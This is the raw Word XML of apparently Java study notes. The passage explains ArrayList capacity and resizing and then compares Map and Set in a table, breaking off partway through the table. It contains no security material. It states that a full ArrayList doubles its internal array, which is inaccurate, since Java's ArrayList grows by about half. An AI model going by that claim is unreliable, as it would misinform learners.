    <w:p w14:paraId="5D4F15B9" w14:textId="77777777" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A8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E01346C" w14:textId="77777777" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F44E162" w14:textId="77777777" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A8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Output the size and the capacity (size will be equal to the number of elements)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208757C0" w14:textId="77777777" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A8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ize of ArrayList: " + list.size());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033E30DA" w14:textId="77777777" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A8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3E4D558" w14:textId="77777777" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A8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CD942A5" w14:textId="77777777" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A8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Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DEB52F" w14:textId="77777777" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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itial Capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: By default, the initial capacity of an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is 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD9A35E" w14:textId="77777777" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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izing Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When the ArrayList reaches its current capacity, it will automatically double the internal array size to accommodate new elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275D1814" w14:textId="77777777" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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izing Cost</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Each resizing operation (doubling the array size) takes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time because the elements need to be copied into the new array. However, this resizing happens less frequently as the array grows, so the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>amortized cost</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> per addition is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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39718352" w14:textId="77777777" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A8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ustomizing the Initial Capacity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C7A247" w14:textId="77777777" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A8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you know that you will be adding a large number of elements and want to optimize performance, you can specify a custom initial capacity when creating the ArrayList. This will prevent frequent resizing if you exceed the default size of 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA94E31" w14:textId="77777777" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A8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Creating an ArrayList with a custom initial capacity of 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2983D2" w14:textId="77777777" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A8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rayList&lt;Integer&gt; list = new ArrayList&lt;&gt;(50);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB2D6D9" w14:textId="77777777" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A8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way, you can control the number of resizing operations that happen as your ArrayList grows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564ACEB5" w14:textId="206C2582"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0268293">
          <v:rect id="_x0000_i1500" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A27E55" w14:textId="77777777" w:rsidR="003D1380" w:rsidRPr="00CE4B95" w:rsidRDefault="003D1380">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="156" w:name="_Toc196307636"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Map and Set?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="156"/>
    </w:p>
    <w:p w14:paraId="5213767C" w14:textId="3C095903" w:rsidR="00A66040" w:rsidRPr="00CE4B95" w:rsidRDefault="00A66040" w:rsidP="00C46B62">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Map</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Set</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are both part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java Collections Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, but they serve different purposes and have different characteristics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB56191" w14:textId="77777777" w:rsidR="00A66040" w:rsidRPr="00CE4B95" w:rsidRDefault="00A66040" w:rsidP="00C46B6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Differences Between Map and Se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9"/>
        <w:gridCol w:w="4360"/>
        <w:gridCol w:w="4115"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C46B62" w:rsidRPr="00CE4B95" w14:paraId="20927AD0" w14:textId="77777777" w:rsidTr="00A66040">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C6CCE70" w14:textId="77777777" w:rsidR="00A66040" w:rsidRPr="00CE4B95" w:rsidRDefault="00A66040" w:rsidP="00C46B6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7538ABED" w14:textId="77777777" w:rsidR="00A66040" w:rsidRPr="00CE4B95" w:rsidRDefault="00A66040" w:rsidP="00C46B6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Map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A288C13" w14:textId="77777777" w:rsidR="00A66040" w:rsidRPr="00CE4B95" w:rsidRDefault="00A66040" w:rsidP="00C46B6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et</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C46B62" w:rsidRPr="00CE4B95" w14:paraId="530981A9" w14:textId="77777777" w:rsidTr="00A66040">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E7E4319"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inition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CE0DF23"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collection of key-value pairs. Each key is unique, and each key maps to exactly one value.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19DD1F61"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collection of unique elements (no duplicates).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C46B62" w:rsidRPr="00CE4B95" w14:paraId="642E13B1" w14:textId="77777777" w:rsidTr="00A66040">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EC01DCB"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lements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B43AFB8"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onsists of </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>key-value pairs</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Entry). Each key is unique, but the values can be duplicated.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EB8D773"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onsists of only </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>unique elements</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (no duplicates).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C46B62" w:rsidRPr="00CE4B95" w14:paraId="33D4D542" w14:textId="77777777" w:rsidTr="00A66040">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56B660FD"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niqueness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DB3B522"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Keys are </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>unique</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>, but values can be duplicated.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6238B06B"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ll elements in a Set are </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>unique</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C46B62" w:rsidRPr="00CE4B95" w14:paraId="34F829D5" w14:textId="77777777" w:rsidTr="00A66040">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07061D65"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mplementation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10A26C0F"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mplemented by classes like </w:t>
            </w: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TreeMap</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LinkedHashMap</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4218300D"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mplemented by classes like </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>HashSe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TreeSe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LinkedHashSet</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C46B62" w:rsidRPr="00CE4B95" w14:paraId="20495E04" w14:textId="77777777" w:rsidTr="00A66040">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F699251"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="001F0146"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lements are accessed via keys (using get() method to retrieve the value associated with a key).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="408097B9"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lements are accessed by direct iteration or searching. No key-value structure is involved.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C46B62" w:rsidRPr="00CE4B95" w14:paraId="5DD61876" w14:textId="77777777" w:rsidTr="00A66040">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39A87E18"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rder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FFA32DE"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does not maintain any order, </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>LinkedHashMap</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> maintains insertion order, </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>TreeMap</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> sorts by keys.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C7E2174"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Set</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> does not maintain order, </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>LinkedHashSet</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> maintains insertion order, </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>TreeSet</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> sorts elements.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C46B62" w:rsidRPr="00CE4B95" w14:paraId="555B9257" w14:textId="77777777" w:rsidTr="00A66040">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79753EFB"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Nulls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21FE1467"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an store </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>null</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> keys and values (but only one null key in a Map), depending on the implementation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B617894"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an store </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>null</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> elements (only one null element in HashSet or LinkedHashSet).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C46B62" w:rsidRPr="00CE4B95" w14:paraId="610410ED" w14:textId="77777777" w:rsidTr="00A66040">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="350A05DF"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arching/Lookup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C9015ED"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s </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>key-based lookup</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (O(1) for HashMap and O(log n) for TreeMap).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EA5FDBD"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lement-based lookup</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (typically O(1) for HashSet and O(log n) for TreeSet).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C46B62" w:rsidRPr="00CE4B95" w14:paraId="54FD0AB0" w14:textId="77777777" w:rsidTr="00A66040">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="740A490F"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ase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49A1B30B"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when you need to associate values with unique keys (e.g., storing user IDs with their names or phone numbers).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
